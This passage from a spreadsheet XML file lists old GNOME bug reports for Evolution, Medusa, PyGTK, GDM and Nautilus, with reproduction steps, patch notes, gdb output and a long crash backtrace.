gtk-sharp (2.10.0.0)
glib-sharp (2.10.0.0)
gnome-sharp (2.16.0.0)
f-spot (0.2.1.0)
mscorlib (1.0.5000.0)
Platform Information: Linux 2.6.20-1.2948.fc6 i686 i386 GNU/Linux
Disribution Information:
[/etc/redhat-release]
Fedora Core release 6 (Zod)
[/etc/fedora-release]
Fedora Core release 6 (Zod)
Other information:</t>
  </si>
  <si>
    <t>juancarloshuerta</t>
  </si>
  <si>
    <t>EVOLUTION-DATA-SERVER-271116</t>
  </si>
  <si>
    <t>wrong gettext initialization breaks translation</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
Steps to reproduce the problem:
1. Set LC_ALL to fr_FR (using an iso8859-15 charset)
2. Open the address book
3. If there's a contact with a phone number the string TÃ©lÃ©phone is
truncated to T and a warning about pango being passed an invalid string
is shown on the console
Additional Information:
This is caused by a wrong gettext initialization of gettext in
addressbook/libebook/e-contact.c
I'm assuming this file is part of a shared library used by evolution in
which case gettext should be initialized as in the attached patch. This
fixes my problem at least. Btw I dunno how costly initializing gettext is
but doing it each time e_contact_pretty_name is called is overkill maybe
there's an initialization function where this could go?</t>
  </si>
  <si>
    <t>GNOME-VFS-347603</t>
  </si>
  <si>
    <t>fix build with gcc 2.95</t>
  </si>
  <si>
    <t>The following patch fixes the test suite to compile successfully with gcc 2.95</t>
  </si>
  <si>
    <t>MEDUSA-45772</t>
  </si>
  <si>
    <t>SOLARIS: Find utility not working</t>
  </si>
  <si>
    <t xml:space="preserve">The find utility is not working:
1) The medusa program is not in the default path area after install. 
2) When the user runs the medusa-indexd command - it returns:
./export/home1/GNOME-debug/bin/medusa-indexd
File system /opt/GNOME-debug/share/medusa has 1985351 blocks 997559 free
ERROR: failed to acquire lock file
there is no point in then running the searchd command as it falls over....
-------------------------------------------------------------
Upon further investigation:
the failure to acquire the lock file was due to a missing directory on Solaris
this will be dealt with in a seperate bug report:
when the correct dir. is created - the indexd command still falls over:
and this creates a core dump...the gdb output from this core file is as follows: 
bash-2.03# /opt/sfw/bin/gdb /opt/GNOME-debug/bin/medusa-indexd core
GNU gdb 4.18
Copyright 1998 Free Software Foundation Inc.
GDB is free software covered by the GNU General Public License and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB.  Type show warranty for details.
This GDB was configured as sparc-sun-solaris2.8...
Core was generated by `/opt/GNOME-debug/bin/medusa-indexd'.
Program terminated with signal 9 Killed.
Reading symbols from /opt/GNOME-debug/lib/libintl.so...done.
Reading symbols from /opt/GNOME-debug/lib/libmedusa.so.0...done.
Reading symbols from /opt/GNOME-debug/lib/libmedusa-index.so.0...done.
Reading symbols from /opt/GNOME-debug/lib/libgnomevfs.so.0...done.
Reading symbols from /opt/GNOME-debug/lib/libgmodule-1.2.so.0...done.
Reading symbols from /opt/GNOME-debug/lib/libgthread-1.2.so.0...done.
Reading symbols from /opt/GNOME-debug/lib/libglib-1.2.so.0...done.
Reading symbols from /usr/lib/libthread.so.1...done.
Reading symbols from /usr/lib/libdl.so.1...done.
Reading symbols from /opt/GNOME-debug/lib/libgnome.so.32...done.
Reading symbols from /opt/GNOME-debug/lib/libgnomesupport.so.0...done.
Reading symbols from /opt/GNOME-debug/lib/libesd.so.0...done.
Reading symbols from /usr/lib/libresolv.so.2...done.
Reading symbols from /usr/lib/librt.so.1...done.
Reading symbols from /usr/lib/libnsl.so.1...done.
Reading symbols from /usr/lib/libsocket.so.1...done.
Reading symbols from /opt/GNOME-debug/lib/libaudiofile-0.2.so.0...done.
Reading symbols from /usr/lib/libm.so.1...done.
Reading symbols from /opt/GNOME-debug/lib/libdb.so...done.
Reading symbols from /opt/GNOME-debug/lib/libxml.so.1...done.
Reading symbols from /usr/lib/libz.so.1...done.
Reading symbols from /usr/lib/libc.so.1...done.
Reading symbols from /opt/GNOME-debug/lib/liboaf.so.0...done.
Reading symbols from /opt/GNOME-debug/lib/libORBitCosNaming.so.0...done.
Reading symbols from /opt/GNOME-debug/lib/libORBit.so.0...done.
Reading symbols from /opt/GNOME-debug/lib/libIIOP.so.0...done.
Reading symbols from /opt/GNOME-debug/lib/libORBitutil.so.0...done.
Reading symbols from /opt/GNOME-debug/lib/libgconf-gtk-1.so.1...done.
Reading symbols from /opt/GNOME-debug/lib/libgconf-1.so.1...done.
Reading symbols from /opt/GNOME-debug/lib/libgtk-1.2.so.0...done.
Reading symbols from /opt/GNOME-debug/lib/libgdk-1.2.so.0...done.
Reading symbols from /usr/lib/libXext.so.0...done.
Reading symbols from /usr/lib/libX11.so.4...done.
Reading symbols from /usr/lib/libintl.so.1...
warning: Lowest section in /usr/lib/libintl.so.1 is .hash at 0x74
done.
Reading symbols from /usr/lib/libaio.so.1...done.
Reading symbols from /usr/lib/libmp.so.2...done.
Reading symbols from /opt/GNOME-debug/lib/libpopt.so.0...done.
Reading symbols from /usr/openwin/lib/libdga.so.1...done.
---Type  to continue or q  to quit---
Reading symbols from /usr/platform/SUNWUltra-5_10/lib/libc_psr.so.1...done.
Reading symbols from /opt/GNOME-debug/lib/libgnomevfs-pthread.so.0...done.
#0  0xfecba3a0 in getmntent () from /usr/lib/libc.so.1
(gdb) where
#0  0xfecba3a0 in getmntent () from /usr/lib/libc.so.1
#1  0xff359ef0 in unsearched_mount_list_initialize () at
medusa-unsearched-locations.c:191
#2  0xff359ce4 in medusa_unsearched_locations_initialize () at
medusa-unsearched-locations.c:121
#3  0xff31dea4 in medusa_master_db_create_index (root_uri=0x28568 file:///
index_name=0x12290 
    log_level=MEDUSA_DB_LOG_NOTHING) at medusa-master-db.c:200
#4  0x11b94 in do_full_indexing (root_directory=0x12288 / index_name=0x12290
)
    at medusa-file-index-daemon.c:320
#5  0x11754 in main (argc=1 argv=0xffbef36c) at medusa-file-index-daemon.c:176
(gdb) bash-2.03#
this is a KNOWN problem and will be fixed in the next release of GNOME 1.4
------- Additional Comments From gnome_bugs@ireland.sun.com 2001-03-08 06:11:34 ----
the Find utility is now core dumping Naut when invoked by the user a fix that
went in between Seth and Laca (the Sun build engineer) has been broken....more
info a.s.a.p.
------- Additional Comments From snickell@stanford.edu 2001-03-08 19:22:58 ----
Changing Peter to be the QA contact for Solaris related bugs.
------- Additional Comments From don@eazel.com 2001-03-19 08:25:56 ----
Let's do this for 1.2.
------- Additional Comments From don@eazel.com 2001-04-04 12:42:51 ----
P2 for 1.0.3.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:53 -------
</t>
  </si>
  <si>
    <t>PYGTK-119738</t>
  </si>
  <si>
    <t>Problems with examples/ *.py scripts</t>
  </si>
  <si>
    <t>Some of the scripts in examples/ of pygtk-1.99.17 begin with a #! line that
points to python2.2. Does that mean that these scripts are not python2.3
compatible? The more usual #! is (some variant of) /usr/bin/env python
but this breaks if there are multiple python interpretters installed. The
one where pygtk2 is installed may not be the first one in a $PATH search.
One could later install an additional python higher in the $PATH or (as
documented) one could specify PYTHON= before running ./configure. Probably
the solution would involve something like having them all be .py.in with
#!@PYTHON@ and letting ./configure set it to whatever python interpretter
is used. Or else a Makefile target (or Makefile in the examples/ directory)
that did the patching (which would also allow future inclusion of a make
target to install the examples). This wouldn't require renaming all of the
examples merely putting them all in examples.in/ and then a Makefile rule
to recursively process the whole thing into examples/.
In marginally-related news some of the .py scripts need to be chmod +x.</t>
  </si>
  <si>
    <t>EVOLUTION-273100</t>
  </si>
  <si>
    <t>Unify Evolution license text check box messages in Evolution mailer</t>
  </si>
  <si>
    <t>#: mail/em-account-editor.c:393
# c-format
msgid 
\n
Please read carefully the license agreement\n
for %s displayed below\n
and tick the check box for accepting it\n
#: mail/mail-dialogs.glade.h:1
msgid 
\n
 Please read carefully the license agreement displayed\n
 below and tick the check box for accepting it\n
There seems to be no reason why these messages need be different.
I suggest that the messages are made identical and that they:
1) Have leading and trailing white space and newlines removed
and
2) Use automatic line wrapping provided by the toolkit so that hard coding
newlines inside the sentence won't be necessary.</t>
  </si>
  <si>
    <t>NAUTILUS-40470</t>
  </si>
  <si>
    <t>[obsolete] Views: Other</t>
  </si>
  <si>
    <t>Producer-consumer queue of file updates for copy engine</t>
  </si>
  <si>
    <t xml:space="preserve">There needs to be a queue of updates that gets filled out by the gnome-vfs async
copy calls and emptied by a process that dispatches the different updates into
the respective directories. The queue needs to be protected by a semaphore. It
will be throw away code for 1.0 only because in the next release we will use a
better lower-level polling/monitoring mechanism.
------- Additional Comments From sullivan@eazel.com 2000-09-08 15:26:46 ----
Setting all bugs to P6 to start official bug-prioritization plan. Please don't
set the priority to anything other than P6 unless you've got the gold seal of
approval for doing so.
------- Additional Comments From eli@eazel.com 2000-10-16 19:49:49 ----
Batch-assigning QA ownership of remaining bugs to eli@eazel.com
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:46 -------
The original reporter (pavel@eazel.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
The original owner (pavel@eazel.com) of this bug does not have an account here.
Reassigning to the default owner of the component nautilus-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>EVOLUTION-258882</t>
  </si>
  <si>
    <t>evolution crashes when replying to a mail in Dutch language environment</t>
  </si>
  <si>
    <t>Description of Problem:
evolution crashes when replying to a mail in Dutch language environment
Steps to reproduce the problem:
1. This only happens in dutch language environment (LANG=nl_NL)
2. This only happens when setting reply style to Quote original message
   in the composer preferences.
3. Reproduces every time also tested on an other PC.
Actual Results:
Crashes as soon as I hit reply.
Expected Results:
The composer window should pop-pup.
How often does this happen? 
always 100% reproducable.
Additional Information:
Let me know if you need more info maybe a stack trace? I did not compile
evo with debugging info yet sorry. But this should reproduce perfectly on
your system. Could it be some corrupted string in nl.po? It's a bit to much
going through 30.000 lines of language translations.
I have tested french german italian and C for comparison they are okay.
Dutch always crashes....</t>
  </si>
  <si>
    <t>pg4i</t>
  </si>
  <si>
    <t>EVOLUTION-272156</t>
  </si>
  <si>
    <t>Empty Trash doesn't work in soap mailer</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
Steps to reproduce the problem:
1. Open Evolution on groupwise with (soap mailer enabled)
2. have some mail(s) in Trash
3. Actions-&gt;Empty Trash
Actual Results:
nothing happens
Expected Results:
 Trash should become empty
How often does this happen?
Always
Additional Information:</t>
  </si>
  <si>
    <t>GNOPERNICUS-117525</t>
  </si>
  <si>
    <t>Braille Settings UI review comments</t>
  </si>
  <si>
    <t>Here's a patch for the 9 glade files in this category... mostly very minor
cosmetic changes this time you'll be glad to know :)  I did modify some of
the labels slightly in particular you should check these they still make
sense because this part of the GUI is disabled for me since I don't have a
braille device to test with.
Only major layout change is in the Braille Display Key Mapping dialog...
this patch moves Add Modify and Remove to a column down the right hand
side again for consistency with the other changes I suggested yesterday.
Also the Command List dialog should probably have a Help button.</t>
  </si>
  <si>
    <t>GDM-80835</t>
  </si>
  <si>
    <t>gdmphotosetup borkage</t>
  </si>
  <si>
    <t>gdmphotosetup behaves incorrect when started. pressing [cancel] does  
exactly what [ok] should do and [ok] behaves like [cancel].</t>
  </si>
  <si>
    <t>ali.akcaagac</t>
  </si>
  <si>
    <t>EVOLUTION-258470</t>
  </si>
  <si>
    <t>Crash on reply (HTML-related?)</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: SuSE Linux 9.0 (i586)
Package: Evolution
Priority: Normal
Version: GNOME2.6. 1.5.7
Gnome-Distributor: GNOME.Org
Synopsis: Crash on reply (HTML-related?)
Bugzilla-Product: Evolution
Bugzilla-Component: Shell
Bugzilla-Version: 1.5.7
BugBuddy-GnomeVersion: 2.0 (2.6.0)
Description:
Crash on reply (HTML-related?)
Debugging Information:
Backtrace was generated from '/opt/gnome/bin/evolution-1.5'
[New Thread 16384 (LWP 13022)]
[New Thread 32769 (LWP 13028)]
[New Thread 16386 (LWP 13029)]
[New Thread 49155 (LWP 13031)]
[New Thread 98308 (LWP 13034)]
[New Thread 81925 (LWP 13033)]
[New Thread 114694 (LWP 13035)]
[New Thread 131079 (LWP 13041)]
[New Thread 147464 (LWP 13048)]
[New Thread 163849 (LWP 13058)]
[New Thread 180234 (LWP 13059)]
[New Thread 196619 (LWP 13060)]
[New Thread 311308 (LWP 13083)]
0x41415ab6 in waitpid () from /lib/i686/libpthread.so.0
#0  0x41415ab6 in waitpid () from /lib/i686/libpthread.so.0
#1  0x404835d8 in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:741
#2  0x08064ce5 in segv_redirect (sig=11) at main.c:455
#3  0x4141496c in __pthread_sighandler () from
/lib/i686/libpthread.so.0
#4  
#5  0x41a12885 in camel_strdown (str=0x0) at camel-string-utils.c:103
#6  0x418e066f in em_format_part (emf=0x9410650 stream=0x46663d08 
    part=0x926bfa8) at em-format.c:518
#7  0x418ea3b4 in emfq_format_message (emf=0x9410650 stream=0x46663d08
    part=0x926bfa8) at em-format-quote.c:369
#8  0x418e9bee in emfq_format_clone (emf=0x9410650 folder=0x0 uid=0x0
    msg=0x926bfa8 src=0x0) at em-format-quote.c:143
#9  0x418f7f57 in em_utils_message_to_html (message=0x926bfa8 
    credits=0x96723f0 On Thu 2004-05-13 at 15:14 -0600 Liz Pedro
wrote: 
    flags=1) at em-utils.c:1338
#10 0x418f3b0d in composer_set_body (composer=0x93b77e0
message=0x926bfa8)
    at em-composer-utils.c:1506
#11 0x418f3c53 in em_utils_reply_to_message (message=0x926bfa8 mode=0)
    at em-composer-utils.c:1553
#12 0x418dbcac in emfv_message_reply (emfv=0x823fcd0 mode=0)
    at em-folder-view.c:1267
#13 0x418da979 in emfv_popup_reply_sender (w=0x0 emfv=0x823fcd0)
    at em-folder-view.c:630
#14 0x418db5bd in emfv_message_reply_sender (uid=0x835bec8
data=0x823fcd0 
    path=0x948ad40 MessageReplySender) at em-folder-view.c:1055
#15 0x40571053 in marshal_VOID__USER_DATA_STRING (closure=0x882be78 
    return_value=0xbfffd650 n_param_values=2 param_values=0x9641ef0 
    invocation_hint=0x0 marshal_data=0x0) at bonobo-ui-component.c:221
#16 0x41592c34 in g_closure_invoke (closure=0x882be78 
    return_value=0xbfffd650 n_param_values=2 param_values=0x9641ef0 
    invocation_hint=0x0) at gclosure.c:437
#17 0x407e6db1 in bonobo_closure_invoke_va_list (closure=0x882be78 
    return_value=0xbfffd650 var_args=0xbfffd6ac Ã¸\rW@) at
bonobo-types.c:415
#18 0x407e703c in bonobo_closure_invoke (closure=0x882be78
return_type=4)
    at bonobo-types.c:478
#19 0x40570e84 in impl_Bonobo_UIComponent_execVerb (servant=0x835bedc 
    cname=0x9356f10 MessageReplySender ev=0xbfffd780)
    at bonobo-ui-component.c:158
#20 0x407e7dfe in _ORBIT_skel_small_Bonobo_UIComponent_execVerb (
    _o_servant=0x835bedc _o_retval=0x0 _o_args=0xbfffd760 _o_ctx=0x0
    _o_ev=0xbfffd780 
    _impl_execVerb=0x40570dec )
    at Bonobo-common.c:1196
#21 0x40a1158b in ORBit_c_stub_invoke (obj=0x835c000
methods=0x40809f04 
    method_index=4 ret=0x0 args=0xbfffd760 ctx=0x0 ev=0xbfffd780 
    class_id=12 method_offset=20 
    skel_impl=0x407e7de3
)
    at poa.c:2627
#22 0x407eae75 in Bonobo_UIComponent_execVerb (_obj=0x835c000 
    cname=0x9356f10 MessageReplySender ev=0xbfffd780) at
Bonobo-stubs.c:1227
#23 0x40578911 in real_exec_verb (engine=0x81a1000 
    component_name=0x8c60968 13022-0 verb=0x88b3e68
MessageReplySender)
    at bonobo-ui-engine.c:1533
#24 0x40578b72 in impl_emit_verb_on (engine=0x81a1000 node=0x8ac8b00)
    at bonobo-ui-engine.c:1591
#25 0x415aa572 in g_cclosure_marshal_VOID__POINTER (closure=0x819e478 
    return_value=0x0 n_param_values=2 param_values=0xbfffdbb0 
    invocation_hint=0xbfffda18 marshal_data=0x405789bf) at
gmarshal.c:601
#26 0x41592eee in g_type_class_meta_marshal (closure=0x819e478 
    return_value=0x0 n_param_values=2 param_values=0xbfffdbb0 
    invocation_hint=0xbfffda18 marshal_data=0x4c) at gclosure.c:514
#27 0x41592c34 in g_closure_invoke (closure=0x819e478 return_value=0x0
    n_param_values=2 param_values=0xbfffdbb0
invocation_hint=0xbfffda18)
    at gclosure.c:437
#28 0x415a9136 in signal_emit_unlocked_R (node=0x819e4d8 detail=0 
    instance=0x81a1000 emission_return=0x0
instance_and_params=0xbfffdbb0)
    at gsignal.c:2474
#29 0x415a80b2 in g_signal_emit_valist (instance=0x81a1000
signal_id=129 
    detail=0 var_args=0xbfffdd40 ) at gsignal.c:2195
#30 0x415a83ff in g_signal_emit (instance=0x81a1000 signal_id=129
detail=0)
    at gsignal.c:2239
#31 0x4057b3e9 in bonobo_ui_engine_emit_verb_on_w (engine=0x81a1000 
    widget=0x87d9c40) at bonobo-ui-engine.c:3040
#32 0x40583b37 in exec_verb_cb (item=0x87d9c40 engine=0x81a1000)
    at bonobo-ui-sync-toolbar.c:191
#33 0x415a98f2 in g_cclosure_marshal_VOID__VOID (closure=0x8b5b2c8 
    return_value=0x0 n_param_values=1 param_values=0xbfffe0e0 
    invocation_hint=0xbfffdf48 marshal_data=0x0) at gmarshal.c:77
#34 0x41592c34 in g_closure_invoke (closure=0x8b5b2c8 return_value=0x0
    n_param_values=1 param_values=0xbfffe0e0
invocation_hint=0xbfffdf48)
    at gclosure.c:437
#35 0x415a8efa in signal_emit_unlocked_R (node=0x80df490 detail=0 
    instance=0x87d9c40 emission_return=0x0
instance_and_params=0xbfffe0e0)
    at gsignal.c:2436
#36 0x415a80b2 in g_signal_emit_valist (instance=0x87d9c40
signal_id=190 
    detail=0 var_args=0xbfffe26c \002\213X@xG\034\blhZ@\001)
    at gsignal.c:2195
#37 0x415a83ff in g_signal_emit (instance=0x87d9c40 signal_id=190
detail=0)
    at gsignal.c:2239
#38 0x40588b8f in bonobo_ui_toolbar_item_activate (item=0x87d9c40)
    at bonobo-ui-toolbar-item.c:446
#39 0x40585d04 in button_widget_clicked_cb (button=0x81c9b68
data=0x87d9c40)
    at bonobo-ui-toolbar-button-item.c:217
#40 0x415a98f2 in g_cclosure_marshal_VOID__VOID (closure=0x8c74910 
    return_value=0x0 n_param_values=1 param_values=0xbfffe620 
    invocation_hint=0xbfffe488 marshal_data=0x0) at gmarshal.c:77
#41 0x41592c34 in g_closure_invoke (closure=0x8c74910 return_value=0x0
    n_param_values=1 param_values=0xbfffe620
invocation_hint=0xbfffe488)
    at gclosure.c:437
#42 0x415a8efa in signal_emit_unlocked_R (node=0x80df5a0 detail=0 
    instance=0x81c9b68 emission_return=0x0
instance_and_params=0xbfffe620)
    at gsignal.c:2436
#43 0x415a80b2 in g_signal_emit_valist (instance=0x81c9b68
signal_id=195 
    detail=0 var_args=0xbfffe7ac rW\003A) at gsignal.c:2195
#44 0x415a83ff in g_signal_emit (instance=0x81c9b68 signal_id=195
detail=0)
    at gsignal.c:2239
#45 0x410357ff in gtk_button_clicked (button=0x81c9b68) at
gtkbutton.c:718
#46 0x4103698c in gtk_real_button_released (button=0x81c9b68)
    at gtkbutton.c:1205
#47 0x415a98f2 in g_cclosure_marshal_VOID__VOID (closure=0x81682f8 
    return_value=0x0 n_param_values=1 param_values=0xbfffeba0 
    invocation_hint=0xbfffea08 marshal_data=0x41036933) at
gmarshal.c:77
#48 0x41592eee in g_type_class_meta_marshal (closure=0x81682f8 
    return_value=0x0 n_param_values=1 param_values=0xbfffeba0 
    invocation_hint=0xbfffea08 marshal_data=0x1a4) at gclosure.c:514
#49 0x41592c34 in g_closure_invoke (closure=0x81682f8 return_value=0x0
    n_param_values=1 param_values=0xbfffeba0
invocation_hint=0xbfffea08)
    at gclosure.c:437
#50 0x415a8a83 in signal_emit_unlocked_R (node=0x80df510 detail=0 
    instance=0x81c9b68 emission_return=0x0
instance_and_params=0xbfffeba0)
    at gsignal.c:2366
#51 0x415a80b2 in g_signal_emit_valist (instance=0x81c9b68
signal_id=194 
    detail=0 var_args=0xbfffed2c Â¿V\003A) at gsignal.c:2195
#52 0x415a83ff in g_signal_emit (instance=0x81c9b68 signal_id=194
detail=0)
    at gsignal.c:2239
#53 0x4103574c in gtk_button_released (button=0x81c9b68) at
gtkbutton.c:710
#54 0x410367d2 in gtk_button_button_release (widget=0x81c9b68
event=0x95cffe4)
    at gtkbutton.c:1121
#55 0x41103e9c in _gtk_marshal_BOOLEAN__BOXED (closure=0x81061d0 
    return_value=0xbfffef50 n_param_values=2 param_values=0xbffff120
    invocation_hint=0xbfffef88 marshal_data=0x410367a5) at
gtkmarshalers.c:82
#56 0x41592eee in g_type_class_meta_marshal (closure=0x81061d0 
    return_value=0xbfffef50 n_param_values=2 param_values=0xbffff120
    invocation_hint=0xbfffef88 marshal_data=0xb4) at gclosure.c:514
#57 0x41592c34 in g_closure_invoke (closure=0x81061d0 
    return_value=0xbfffef50 n_param_values=2 param_values=0xbffff120
    invocation_hint=0xbfffef88) at gclosure.c:437
#58 0x415a9136 in signal_emit_unlocked_R (node=0x8106208 detail=0 
    instance=0x81c9b68 emission_return=0xbffff0a0 
    instance_and_params=0xbffff120) at gsignal.c:2474
#59 0x415a812f in g_signal_emit_valist (instance=0x81c9b68
signal_id=45 
    detail=0 var_args=0xbffff2b0 Ã Ã²Ã¿Â¿h) at gsignal.c:2205
#60 0x415a83ff in g_signal_emit (instance=0x81c9b68 signal_id=45
detail=0)
    at gsignal.c:2239
#61 0x41220076 in gtk_widget_event_internal (widget=0x81c9b68
event=0x95cffe4)
    at gtkwidget.c:3563
#62 0x4121fbae in gtk_widget_event (widget=0x81c9b68 event=0x95cffe4)
    at gtkwidget.c:3369
#63 0x41102270 in gtk_propagate_event (widget=0x81c9b68
event=0x95cffe4)
    at gtkmain.c:2344
#64 0x41100da5 in gtk_main_do_event (event=0x95cffe4) at gtkmain.c:1582
#65 0x414b1766 in gdk_event_dispatch (source=0x80946f8 callback=0 
    user_data=0x0) at gdkevents-x11.c:2133
#66 0x415f554d in g_main_dispatch (context=0x8094740) at gmain.c:1895
#67 0x415f68b9 in g_main_context_dispatch (context=0x8094740) at
gmain.c:2441
#68 0x415f6dec in g_main_context_iterate (context=0x8094740 block=1 
    dispatch=1 self=0x8075230) at gmain.c:2522
#69 0x415f7643 in g_main_loop_run (loop=0x80fc5e8) at gmain.c:2726
#70 0x407d19ff in bonobo_main () at bonobo-main.c:297
#71 0x08065217 in main (argc=1 argv=0xbffff734) at main.c:605
Thread 13 (Thread 311308 (LWP 13083)):
#0  0x41411b94 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x414119d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x4140de90 in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x4008d86e in e_msgport_wait (mp=0x8163eb8) at e-msgport.c:511
	_buffer = {__routine = 0x4008d5d6  
  __arg = 0x8163eb8 __canceltype = 1192492596 __prev = 0x0}
	msg = (EMsg *) 0x4141016f
#4  0x4008e186 in thread_dispatch (din=0x8163e60) at e-msgport.c:874
	e = (EThread *) 0x8163e60
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x0
	self = 311308
#5  0x4140ef60 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
#6  0x41733327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 12 (Thread 196619 (LWP 13060)):
#0  0x4172ab66 in poll () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x415f7af1 in g_main_context_poll (context=0x86cc700 timeout=-1 
    priority=2147483647 fds=0x46618678 n_fds=9) at gmain.c:2824
	poll_func = 0x4172ab00 
#2  0x415f6dc1 in g_main_context_iterate (context=0x86cc700 block=1 
    dispatch=1 self=0x86cef58) at gmain.c:2517
	max_priority = 2147483647
	timeout = -1
	some_ready = 1
	nfds = 9
	allocated_nfds = 10
	fds = (GPollFD *) 0x46618678
#3  0x415f7643 in g_main_loop_run (loop=0x86cef48) at gmain.c:2726
	self = (GThread *) 0x86cef58
#4  0x409d37ee in link_io_thread_fn (data=0x0) at linc.c:343
No locals.
#5  0x4161308b in g_thread_create_proxy (data=0x86cef58) at
gthread.c:559
	thread = (GRealThread *) 0x86cef58
#6  0x4140ef60 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
#7  0x41733327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 11 (Thread 180234 (LWP 13059)):
#0  0x41411b94 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x414119d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x4140de90 in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x415ddd20 in g_async_queue_pop_intern_unlocked (queue=0x86cd328
try=0 
    end_time=0x0) at gasyncqueue.c:226
	retval = 0x41655d58
#4  0x415dded4 in g_async_queue_pop (queue=0x86cd328) at
gasyncqueue.c:266
	retval = 0x967b6f8
#5  0x41b7f5a6 in worker (data=0x0) at e-book-async.c:25
	msg = (EBookMsg *) 0x967b6f8
#6  0x4161308b in g_thread_create_proxy (data=0x86cd398) at
gthread.c:559
	thread = (GRealThread *) 0x86cd398
#7  0x4140ef60 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
#8  0x41733327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 10 (Thread 163849 (LWP 13058)):
#0  0x4172ab66 in poll () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x415f7af1 in g_main_context_poll (context=0x86cd3d8 timeout=-1 
    priority=2147483647 fds=0x86ccf58 n_fds=1) at gmain.c:2824
	poll_func = 0x4172ab00 
#2  0x415f6dc1 in g_main_context_iterate (context=0x86cd3d8 block=1 
    dispatch=1 self=0x86ca568) at gmain.c:2517
	max_priority = 2147483647
	timeout = -1
	some_ready = 1
	nfds = 1
	allocated_nfds = 1
	fds = (GPollFD *) 0x86ccf58
#3  0x415f7643 in g_main_loop_run (loop=0x86ca0f0) at gmain.c:2726
	self = (GThread *) 0x86ca568
#4  0x41b8b658 in startup_mainloop (arg=0x0) at e-book.c:2357
	loop = (GMainLoop *) 0x86ca0f0
#5  0x4140ef60 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
#6  0x41733327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 9 (Thread 147464 (LWP 13048)):
#0  0x41411b94 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x414119d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x4140de90 in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x4008d86e in e_msgport_wait (mp=0x86286b8) at e-msgport.c:511
	_buffer = {__routine = 0x4008d5d6  
  __arg = 0x86286b8 __canceltype = 135865048 __prev = 0x0}
	msg = (EMsg *) 0x4141016f
#4  0x4008e186 in thread_dispatch (din=0x861a798) at e-msgport.c:874
	e = (EThread *) 0x861a798
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x0
	self = 147464
#5  0x4140ef60 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
#6  0x41733327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 8 (Thread 131079 (LWP 13041)):
#0  0x41411b94 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x414119d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x4140de90 in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x4008d86e in e_msgport_wait (mp=0x8164090) at e-msgport.c:511
	_buffer = {__routine = 0x4008d5d6  
  __arg = 0x8164090 __canceltype = 1157045812 __prev = 0x0}
	msg = (EMsg *) 0x4141016f
#4  0x4008e186 in thread_dispatch (din=0x8164038) at e-msgport.c:874
	e = (EThread *) 0x8164038
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x8505538
	self = 131079
#5  0x4140ef60 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
#6  0x41733327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 7 (Thread 114694 (LWP 13035)):
#0  0x41411b94 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x414119d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x4140de90 in pthread_cond_wait@GLIBC_2.0 () from
/lib/i686/libpthread.so.0
No symbol table info available.
#3  0x4008d86e in e_msgport_wait (mp=0x8164090) at e-msgport.c:511
	_buffer = {__routine = 0x4008d5d6  
  __arg = 0x8164090 __canceltype = 1148481060 __prev = 0x0}
	msg = (EMsg *) 0x4141016f
#4  0x4008e186 in thread_dispatch (din=0x8164038) at e-msgport.c:874
	e = (EThread *) 0x8164038
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x8326490
	self = 114694
#5  0x4140ef60 in pthread_start_thread () from
/lib/i686/libpthread.so.0
No symbol table info available.
#6  0x41733327 in clone () from /lib/i686/libc.so.6
No symbol table info available.
Thread 6 (Thread 81925 (LWP 13033)):
#0  0x41411b94 in __pthread_sigsuspend () from
/lib/i686/libpthread.so.0
No symbol table info available.
#1  0x414119d8 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
